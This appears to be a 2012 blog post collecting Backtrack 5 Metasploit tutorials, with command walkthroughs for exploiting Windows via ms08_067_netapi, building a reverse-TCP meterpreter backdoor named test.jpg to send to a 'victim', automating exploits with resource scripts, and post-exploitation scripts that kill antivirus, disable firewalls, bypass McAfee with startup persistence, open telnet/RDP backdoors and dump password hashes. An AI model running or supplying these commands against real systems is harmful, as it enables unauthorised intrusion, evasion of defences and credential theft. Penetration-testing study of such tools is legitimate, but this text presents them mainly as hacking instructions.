Tuesday 31 July 2012

Nessus With Metasploit Tutorial- Backtrack 5 Video Tutorial

Nessus the best vulnerability scanner, management and assessment tool and the metasploit the best database, software, program and tool for exploits. They both are the best in their domain but when we connect them to each other there is a extra smartness and purity occur in short we will make a best penetration testing tool for exploit an operating system by using Nessus with Metasploit. However there is a different way to do so and we have shared different methods and tutorials to integrate Metasploit with nessus or vice versa.

In this article we will discuss the video tutorial in which I will show you the power of Nessus and metasploit. This tutorial is little from other tutorials that has been discussed before about Nessus,Metasploit, Nmap and Nexpose.

Here is the list of some tutorials and than I will show you the difference between them to this tutorial.

Below is the tutorial in which I will show some advance feature of nessus like Filter feature to get the exploit available on the public and by using Metasploit I will show you how to exploit a computer or a vulnerability that has been found by nessus.

Nessus Metasploit On Backtrack 5

After watching the video tutorial of Nessus with Metasploit backtrack 5 you have an idea about how to hack a vulnerable computer. This is why vulnerability scanning and patch management is very important.

Metasploit Tutorials From Beginner to Advance

Metasploit the database of all the exploits or a master of exploits, there are different tutorials of metasploit are available on Internet some of them are very useful. You can find different tutorials of metasploit with other tools like Nmap, Nessus, Nexpose and OpenVAS and we have also shared different tutorials for metasploit both videos and text based tutorial. This article will not discuss the new tutorial of metasploit but this article is a sort of index page for metasploit tutorial.

As we have shared a list of backtrack 5 tutorial so here is the list of metasploit tutorial that will help a newbie or a professional to learn and to implement metasploit rules in the real penetration testing environment.

Metasploit- An Introduction

Armitage - Cyber Attack Management

Integrate Nessus With Metasploit- Tutorial

How To Use Armitage In Backtrack 5- Tutorial

Fast Track Hacking-Backtrack5 Tutorial

Metasploit 4 Advance Penetration Testing Tool

Karmetasploit- Backtrack 5 Tutorial

Social Engineering toolkit Tutorial-Backtrack 5

Metasploit Autopwn With Nessus Backtrack 5 Tutorial

Autopwn Metasploit Backtrack 5- Postgresql Solved

Metasploit Remote Desktop Exploit-Backtrack 5

Nexpose Vulnerability Scanner Tutorial- Linux Backtrack

Nessus With Metasploit Tutorial- Backtrack 5 Video Tutorial

This will be update as soon as new article will be publish so keep in touch to learn more to learn hacking and penetration testing with metasploit on backtrack machine.

Metasploit Basic Command Tutorial

There are many new user of metasploit (beginner of metasploit) ask use to write a basic introductory article about the basic metasploit command and basic usage of metasploit, however we have shared different advance and mid level metasploit tutorial on backtrack 5 you can learn different commands from these tutorials but here is the list of the best and most common commands that are used inmetasploit for different purposes. Later on we will share meterpreter commands as well.

Metasploit is the database of all exploits and a software that contain information about different exploits so here is the basic usage of metasploit, I am using backtrack 5 machine for this tutorial however if you are using other Linux distribution or windows OS than it is fine but the requirement is Metasploit.

Msfconsole

Msfconsole is a console or a command windows of metasploit that will give you the full support of internal and external metasploit commands, there was a web interface of metasploit but now we don't have that option.

So on your terminal type msfconsole to start metasploit console.

root@bt:~# msfconsole

Metasploit is also available on GUI (graphical user interface), if you want to run metasploit GUI than on the terminal type.

root@bt:~# msfgui

Help command of metasploit will give you the basic idea about the usage of metasploit, if you are looking for msfconsole help than from the root windows type

root@bt:~# msfconsole -h

For msfconsole usage you need to be on msfconsole window to get the help.

msf > help

Connect command is nothing but the alternate of telnet and ncat in metasploit, use connect command to connect with the remote and local host on metasploit you can define the IP of the host machine.

msf > connect -s www.metasploit.com 443

[*] Connected to www.metasploit.com:443

GET / HTTP/1.0

-s → SSL

Ping command of msfconsole is to check the alive host and so on.

msf > ping 192.168.1.45

Show exploits is a command to check all the available exploits on metasploit

msf > show exploits

Show payloads just like show exploits, show payloads will show you all the available payloads on metasploit.

msf > show payloads

Info command will give you more information about any exploits and payloads.

Msf>info <exploit>

msf>info <payload>

Use command will give metasploit an instruction to use a exploit or payload.

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) >

msf exploit(ms08_067_netapi) > show options To show available options

msf exploit(ms08_067_netapi) > set rhost 119.67.45.2 → To set remote IP (victim IP)

msf exploit(ms08_067_netapi) > set lhost 192.168.1.45 → To set local IP (attacker IP)

msf exploit(ms08_067_netapi) > set rport 445 → To set port number of remote host

msf exploit(ms08_067_netapi) > set lport 443 → To set port number of local host

msf exploit(ms08_067_netapi) > set payload windows/vncinject/reverse_tcp_dns → Tp set payload

msf exploit(ms08_067_netapi) > unset rhost → To remove rhost

msf exploit(ms08_067_netapi) > unset lhost → To remove local host

msf exploit(ms08_067_netapi) > exploit → To execute exploit

msf exploit(ms08_067_netapi) > back → To go back on the main window

msf exploit(ms08_067_netapi) > sessions -l → To check any active session

msf exploit(ms08_067_netapi) > sessions -i ID → To go on a active session ID must be numeric number

Buffer Overflow Attack Tutorial - Backtrack 5

Firewall and anti-virus are to protect your computer from hacking attack and from viruses but sometimes an attacker can easily bypass them and can get root access into your computer, there are so many techniques and tools are available to bypass or cheat anti-virus and firewall. Buffer overflow is the most common type of computer security attack that allows a hacker to get the administrator access into a computer or a network. As we have discussed so many tutorial by using Backtrack 5 to hack into windows operating system, however there are many exploits are also available for Linux operating system.

I really don't know about the author of this video but the video contain a good example of buffer overflow attack by using an exploit.

Requirements

Backtrack 5 or Backtrack 5 R1 (Attacker)
Windows (Victim)
Mestaploit
Apache
Brain

Armitage and Metasploit Video Tutorial – Hacking Training

Armitage has changed the way of hacking, Armitage is act like a graphical user interface of Metesploit, there are so many tutorials of metasploit and armitage are available on the Internet and we have also discussed armitage andmetasploit on different articles by using Backtrack 5 R1, below is the video tutorials of metasploit and armitage that will discuss armitage hacking from beginning. This wonderful video and hacking lectures has been created by Raphael Mudge.

Introduction

This lecture introduces penetration testing, this course, and the overall network penetration testing process.

Metasploit

This lecture introduces the Metasploit Framework and Armitage. By the end of this lecture, you will understand Metasploit, the vocabulary around it, and how to work in the Metasploit console

Access

This lecture teaches you how to use Metasploit to break into hosts. You'll learn how to hack without exploits, use client-side attacks, and launch the right remote exploit when applicable.

Post-Exploitation

This lecture teaches what to do after you break into a host. You'll learn how to interact with a host, browse files, steal keystrokes, kill programs, and use Metasploit's powerful post-exploitation modules. Armitage's logging features are covered as well.

Maneuver

The last step is to take your access and turn it into more access. This lecture shows how to use Metasploit's pivoting to get at otherwise unreachable hosts, scan through a pivot, dump hashes, and abuse a Windows Active Directory domain.

Team Tactics

Now you know the whole network attack process, but you'll rarely work alone. This lecture shows you how to use the teaming features of Armitage to accomplish everything from the previous lectures. You'll learn how to use Armitage for real-time communication, data sharing, and session sharing. Finally, you'll also learn how to use external tools with Metasploit's pivoting ability.

Source

Metasploit Meterpreter Scripting Backtrack 5 Tutorial

Information security is a broad field and it involves the penetration testing and computer forensic as well, there are so many tools are available to perform the penetration testing on the target, Metasploit is one of the best tool among them. Meterpreter is a powerful feature of metasploit that uses DLL injection to communicate over the socket. Meterpreter works on the client-side by providing a powerful environment to communicate, to transfer files.

A meterpreter session can be established after successfully exploiting the host. Available meterpreter scripts on a metasploit database automate multiple processes, such as:

Capture the screen
Keylogging
File transfer
Service detection and more

Even with numerous meterpreter scripts available, you are free to write and to create your own script that is best suited to your work. Some important aspects about the meterpreter script would be:

Written in Ruby programming language
Located in the metasploit directory
Meterpreter scripts are creating everyday by different authors click here to check the list.
Meterpreter scripts are very helpful to automate the process after compromising the host
Meterpreter scripts are based on API and you can get more information here.

There are so many meterpreter scripts that are available publicly for you to use, but if you want to create a new meterpreter script of your own and for public usage, this is readily doable. All you need to do is to follow some rules and regulations so that your script does not conflict with the standard variables. Ruby programming language is a basic need in order to write a script for meterpreter. Other important rules to follow are:

Always use description so that the others will understand it
Use local variable not global variable
Always provide help option for better usage
Keep in mind the target host (operating system, service pack (if windows), Kernel (for Unix) ) while creating a script, because all the system’s software does not contain all types of vulnerabilities

Let us consider an example: in our scenario, we need to create an infected file (a backdoor) so that we can send it to the victim. Metasploit needn’t be that big of a deal; you can even create a backdoor by using fast-track.

root@bt:~/Desktop# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2
LPORT=4444 Desktop > test.jpg
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}

As we have typed all the things in, we can automate the process by creating a new script:

root@bt:/pentest/exploits/framework3# touch a.rb
root@bt:/pentest/exploits/framework3# echo msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.2 LPORT=4444 Desktop > test.jpg
root@bt:/pentest/exploits/framework3# ruby a.rb
root@bt:/pentest/exploits/framework3#

The result is the same. It is also possible to create a jpg file but that method is fast. Since the time-consuming method is repeating the same step, why not create a script for that to do all these jobs automatically? There are different meterpreter scripts are available; just look at the picture below.

This is just one small example. Let’s create a script taking advantage of a vulnerability that will exploit an operating system:

root@bt:/pentest/exploits/framework3# touch test.rc
root@bt:/pentest/exploits/framework3# echo use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi
root@bt:/pentest/exploits/framework3# echo set RHOST 192.168.1.6
set RHOST 192.168.1.6
root@bt:/pentest/exploits/framework3# echo exploit
exploit
root@bt:/pentest/exploits/framework3# msfconsole -r test.rc

Beyond this, if we use the manual technique to do then job, then we will need to define:

The exploit for this case (well I have used nessus before that is why I know the system is vulnerable to ms08-067-netapi bug)
We need to set the remote host manually
We need to set local host and port manually

After the execution, the meterpreter session must be active if and only if the operating system is vulnerable, such as in this case:

Now in this meterpreter session, we are able to call different scripts. We can also create our own script as well, as discussed above. Below, I will show you some of the best meterpreter scripts. These are highly useful in the process of penetration testing; however, developers are refining these scripts daily, so be active in the community and on different blogs and forums to keep yourself updated.

Screenspy Script

This is the basic script that will capture the screen of the victim’s computer. All you need to do is type in “run screenspy.” To get help of usage, just type in “run screenspy -h” on the meterpreter screen. After the execution, Firefox will open with a picture of the victim’s computer at that moment.

KillAv Script

Killav script is a pretty famous script. As the name suggests, it will kill (close) antivirus softwares, so if you don’t want that antivirus’ software to disturb you, be sure to kill all of these antivirus softwares by using this script:

meterpreter > run killav
  [*] Killing Antivirus services on the target...
  meterpreter >

Killav contains the information on most of the better known anti-virus’s, but if there is a new anti-virus, then you will need to edit this script for the best performance. As before with the script file, we can find the famous anti-virus exe name:

winppr32.exe
winrecon.exe
winservn.exe
winssk32.exe
winstart.exe
winstart001.exe
wintsk32.exe
winupdate.exe
wkufind.exe
wnad.exe
wnt.exe
wradmin.exe
wrctrl.exe
wsbgate.exe
wupdater.exe
wupdt.exe
wyvernworksfirewall.exe
xpf202en.exe
zapro.exe
zapsetup3001.exe
zatutor.exe
zonalm2601.exe
zonealarm.exe

Getcountermeasure Script

Killav is a power script and it can kill a lot of different anti-virus’s, but the problem is that when you implement killav, windows may show some types of errors and other alerts, not to mention firewalls. This is remedied by a wonderful script called Getcountermeasure:

meterpreter > run getcountermeasure -h
  Getcountermeasure -- List (or optionally, kill) HIPS and AV
  processes, show XP firewall rules, and display DEP and UAC
  policies

  OPTIONS:

  -d Disable built in Firewall
  -h Help menu.
  -k Kill any AV, HIPS and Third Party Firewall process found.

Just imagine how powerful this script is! It has an ability to fight against Firewall, Anti-virus, IPS and even third party firewall that are so very common nowadays. It is really better than Killav. To use it:

meterpreter > run getcountermeasure -d 

  [*] Running Getcountermeasure on the target...
  [*] Checking for contermeasures...
  [*] Getting Windows Built in Firewall configuration...
  [*]
  [*]     Domain profile configuration:
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Enable
  [*]     Exception mode = Enable
  [*]
  [*]     Standard profile configuration (current):
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Disable
  [*]     Exception mode = Enable
  [*]
  [*]     Local Area Connection firewall configuration:
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Enable
  [*]
  [*] Disabling Built in Firewall.....
  [*] Checking DEP Support Policy...

Try to understand the power of this wonderful script: it will remove security logs as well look at the picture.

Gettelnet script

Telnet is one of the most famous services on the windows operating system. It will allow a remote connection, so if you want to open telnet on the victim’s computer for future use, then it is a good script to use. However, as an advance we can use SSH service for remote connection. We can also install netcat as a backdoor on a compromised host for future connections. Use this command to get more help

  meterpreter > gettelnet -h

There are a lot of different scripts are available but here we will discuss only the most important ones. These will help you to understand the network as well as help you for future connections:

Net Enum- Network Enumeration Script

Netenum is a network enumeration script that is a wonderful script for:

Domain Name for DNS Forward Lookup
To Perform DNS Forward Lookup on host list and domain
The target address range or CIDR identifier
To Perform DNS lookup of MX and NS records for a domain
To Perform Service Record DNS lookup for a domain
To Perform Ping Sweep on IP Range

Checkvm- Check Virtual Machine

Virtual machines are now an important part of enterprise network and most of the large (and even small) networks are using them. Checkvm is a script that will let you monitor the status of the victim, whether on virtual machine or not. It will also let you see the type of virtual machine. Here is the output of this case:

 meterpreter > run checkvm
  [*] Checking if target is a Virtual Machine .....
  [*] This is a Sun VirtualBox Virtual Machine
  meterpreter >

Virus Scan Bypass

Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder, adds it to exclusion list and sets it to run at startup. Though we have discussed two scripts that kill anti-virus protections, it is good to run different scripts to verify your attack.

  meterpreter > run virusscan_bypass -h

Enable RDP- Getgui

If you want a graphical user interface of the victim’s computer, then you need to open a service called RDP (remote desktop protocol):

  meterpreter > run getgui -e
  [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
  [*] Carlos Perez carlos_perez@darkoperator.com
  [*] Enabling Remote Desktop
  [*]     RDP is disabled; enabling it ...
  [*] Setting Terminal Services service startup mode

Hashdump

Last but not the least: I really don’t want to end this article without sharing hashdump, in case you want to secure password hashes from the victim for future use. In some cases, these hashes works on other platforms:

 meterpreter > run hashdump
  [*] Obtaining the boot key...
  [*] Calculating the hboot key using SYSKEY 374d90e7c3ff37a0d6064c461200ca22...
  [*] Obtaining the user list and keys...
  [*] Decrypting user keys...
  [*] Dumping password hashes...
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:d298b9b7042eb51df888799802d50eee:fbd49eecf08b5a011f32c57a953b5a99:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:26b787a3004f92dd4d94d34db9863999:::

If you have some other wonderful scripts, please share with in the comments!